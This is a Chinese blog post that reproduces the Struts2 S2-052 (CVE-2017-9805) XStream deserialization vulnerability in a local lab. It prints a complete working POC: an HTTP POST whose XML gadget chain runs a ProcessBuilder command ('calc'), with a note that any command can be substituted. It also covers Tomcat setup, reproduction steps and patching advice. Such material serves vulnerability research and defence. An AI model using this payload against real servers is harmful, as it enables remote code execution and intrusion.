s2-052复现

struts2这两天又出新漏洞了,漏洞为s2-052,这里是对漏洞的复现。只用于个人研究

s2-052漏洞介绍

问题出现在struts2-rest-plugin插件XStreamHandler处理器中的toObject()方法,其中未对传入的值进行任何限制,在使用XStream反
漏洞编号:CVE-2017-9805(S2-052)
影响版本:Struts 2.5 - Struts 2.5.12

s2-052 POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
POST /struts2-rest-showcase/orders/3;jsessionid=A82EAA2857A1FFAF61FF24A1FBB4A3C7 HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/xml
Content-Length: 2365
Referer: http://127.0.0.1:8080/struts2-rest-showcase/orders/3/edit
Cookie: JSESSIONID=A82EAA2857A1FFAF61FF24A1FBB4A3C7
Connection: close
Upgrade-Insecure-Requests: 1
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
<string>calc</string>
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>

注意:执行命令的地方在于command内,这里我是在windows上执行的,在其他系统中执行写出相对应的就可以了

1
2
3
4
5
<command>
<string>
calc
</string>
</command>

s2-052漏洞复现

安装Java

下载JDK

在官网上下载JDK http://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html
我是在windows上搭建的所以,下载windows版本的

配置环境变量

1 新建系统变量:
变量名:JAVA_HOME
变量值:你的JDK安装目录
2 再新建系统变量:
变量名:CLASSPATH
值:.;%JAVA_HOME%\lib;%JAVA_HOME%\lib\dt.jar;%JAVA_HOME%\lib\tools.jar;%TOMCAT_HOME%\BIN
注意:前面的点号
3 修改PATH变量
变量名:PATH
值:;%JAVA_HOME%\bin;%JAVA_HOME%\jre\bin;
注意:前面的分号,将此值添加到,path变量值的最后面

安装Tomcat

下载Tomcat

在官网上下载Tomcat http://tomcat.apache.org/download-90.cgi
下载你需要的版本
下载完成以后解压到你想解压的目录就可以了

配置Tomcat的环境变量

新建Tomcat环境变量
变量名:TOMCAT_HOME
变量值:你的TOMCAT所在目录

启动Tomcat

打开bin文件夹—双击startup.bat;系统会打开一个dos窗口,即启动成功;
如果未打开dos窗口或者dos窗口一闪而过,可能是jdk的配置出错,请安装上面的进行注意检查

访问:http://127.0.0.1:8080
注意:若要修改tomcat端口,可打开/Library/Tomcat/conf/server.xml文件,修改8080端口。

下载受影响的struts2版本

1.从struts2的官网下载最后受影响的版本struts-2.5.12,地址: http://archive.apache.org/dist/struts/2.5.12/struts-2.5.12-apps.zip 注意下载struts-2.5.12-apps即可,不需要下载struts-2.5.12-all.zip。不然struts-2.5.12-all.zip中包含很多其他的东西,可以看到lib目录下有很多jar包。
2.拿到struts-2.5.12-apps之后,将其中的app目录下的struts2-rest-showcase.war文件放到webapps目录下,然后设置一下conf/server.xml文件即可。
3.这里把appBase设置为webapps目录,然后unpackWARs设置为true,这样就会自动解包xxx.war,autoDeploy也设置为true(热部署?) 然后就可以浏览器访问了。 直接输入 http://127.0.0.1:8080/struts2-rest-showcase/ 会跳转,然后出现下面的页面

开始复现

进入编辑页面

设置抓包,点击提交按钮


修改Content-Type和POST提交的数据

可以看到计算器已经调用出来

修补方法

1.升级Struts到2.5.13最新版本。
2.在不使用时删除Struts REST插件,或仅限于服务器普通页面和JSONs

python验证脚本

https://github.com/ysrc/xunfeng/commit/f9ae69fe176c8bca622831e126cd94414ebe26f6?from=timeline&isappinstalled=0


-------------本文结束感谢您的阅读-------------


本文标题:s2-052复现

文章作者:Y-HKL

发布时间:2017年09月08日 - 03:09

最后更新:2017年09月08日 - 04:09

原始链接:http://y-hkl.top/2017/09/08/s2-052复现/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。